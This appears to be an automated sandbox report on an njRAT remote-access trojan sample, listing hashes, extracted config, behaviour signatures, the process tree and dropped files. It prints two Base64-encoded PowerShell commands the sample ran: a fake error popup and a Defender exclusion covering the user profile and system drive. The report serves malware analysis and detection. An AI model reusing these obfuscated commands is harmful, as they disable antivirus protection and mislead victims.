Analysis

  • max time kernel
    31s
  • max time network
    42s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-09-2024 09:41

Errors

Reason
Machine shutdown

General

  • Target

    filetest.exe

  • Size

    33KB

  • MD5

    ef59fb3c39255044648423954f1da668

  • SHA1

    45cf2370789c5314fa2c57221ca02b6ef877be60

  • SHA256

    ed307213c0e62af8477e9ca939b045da7498c21d7c717011a78b3b2de8dfec3a

  • SHA512

    907aefa515e7df8dd215f57ec47d96e79cf5b63b0a4e7aeb81ed8ce2540796dd4281ce46d3b06b4bda4c250aec6bd62b83b5018979cea064fa7f37fd7e55f101

  • SSDEEP

    768:uR5KrKvDIAuBtvoY2vIP0S9QY3UuTWUSX94HPy8R9:rKvMnf2Ie+U1NX94vy8/

Malware Config

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

Mutex

ee714fb89d1a0ba22c66b8980599112e

Attributes
  • reg_key

    ee714fb89d1a0ba22c66b8980599112e

  • splitter

    |'|'|

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\filetest.exe
    "C:\Users\Admin\AppData\Local\Temp\filetest.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4088
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAZwBzACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAZgB1ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARABvAHcAbgBsAG8AYQBkACAARQByAHIAbwByACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHkAawBnACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAegBkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAagB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdABkACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:336
    • C:\Users\Admin\AppData\Local\Temp\Server.exe
      "C:\Users\Admin\AppData\Local\Temp\Server.exe"
      2⤵
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious behavior: AddClipboardFormatListener
      PID:3156
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:1460

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    614f88cf39eb3223246afec4bf1463b4

    SHA1

    74d738ee6fdada75ac1ef1645073005e3f6b6cfb

    SHA256

    021636a793f57f23b16356c5b84fdf0122fdcadfaba305e4df4654bfbfa442bd

    SHA512

    84a7151e0471e659699a15c25d9063af1975e79bb5f23de6b3bc0d3b96cd161d70ad35f6acdbc8123b38bac9918df8b202bd6f1f4ca8061919074973e6063a77

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    ce9d038b7edfad3407ea4995f6851d26

    SHA1

    41e084dd17e6dcb3fa0c845444f636fdbe7a3cfb

    SHA256

    b38b6828021e0a62effbd71d1dfb70c2523b0f6fafad9470ac7d6e3e0b7fc382

    SHA512

    1b8bb3311c0c5f62ca096893efe901e6e757ee3be310d030b0666b5be4c7f1d704788e8cad12cb789aedaf2bc587565483abd351fa0cbedd72af55f319a37897

  • C:\Users\Admin\AppData\Local\Temp\Server.exe

    Filesize

    24KB

    MD5

    fa9439d61c3c28bb92a75095cf39d6bc

    SHA1

    a959b37a215b1417e72fb7df722e9cecd8f29629

    SHA256

    5f135cd0ac161e5ec8e90598e5ad2f1db3981a597a3c0f1cbd4aac54189c62a8

    SHA512

    49703b19e66daa3932dc7074b99ef6859005b45f99b7cd84d3681291cf006b4526ca7561bbfeb6c1527fa7ab57d9164eaaf331af3308416b23ac6e5cc59c7fa2

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ltbkmllu.uff.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/3156-33-0x0000000000010000-0x000000000001C000-memory.dmp

    Filesize

    48KB

  • memory/4088-1-0x0000000000A30000-0x0000000000A3E000-memory.dmp

    Filesize

    56KB

  • memory/4088-2-0x00007FFABBF30000-0x00007FFABC9F1000-memory.dmp

    Filesize

    10.8MB

  • memory/4088-0-0x00007FFABBF33000-0x00007FFABBF35000-memory.dmp

    Filesize

    8KB

  • memory/4088-44-0x00007FFABBF30000-0x00007FFABC9F1000-memory.dmp

    Filesize

    10.8MB

  • memory/4088-19-0x00007FFABBF33000-0x00007FFABBF35000-memory.dmp

    Filesize

    8KB

  • memory/4088-20-0x00007FFABBF30000-0x00007FFABC9F1000-memory.dmp

    Filesize

    10.8MB

  • memory/4736-4-0x000002BC78DA0000-0x000002BC78DC2000-memory.dmp

    Filesize

    136KB

  • memory/4736-18-0x00007FFABBF30000-0x00007FFABC9F1000-memory.dmp

    Filesize

    10.8MB

  • memory/4736-15-0x00007FFABBF30000-0x00007FFABC9F1000-memory.dmp

    Filesize

    10.8MB

  • memory/4736-13-0x00007FFABBF30000-0x00007FFABC9F1000-memory.dmp

    Filesize

    10.8MB

  • memory/4736-14-0x00007FFABBF30000-0x00007FFABC9F1000-memory.dmp

    Filesize

    10.8MB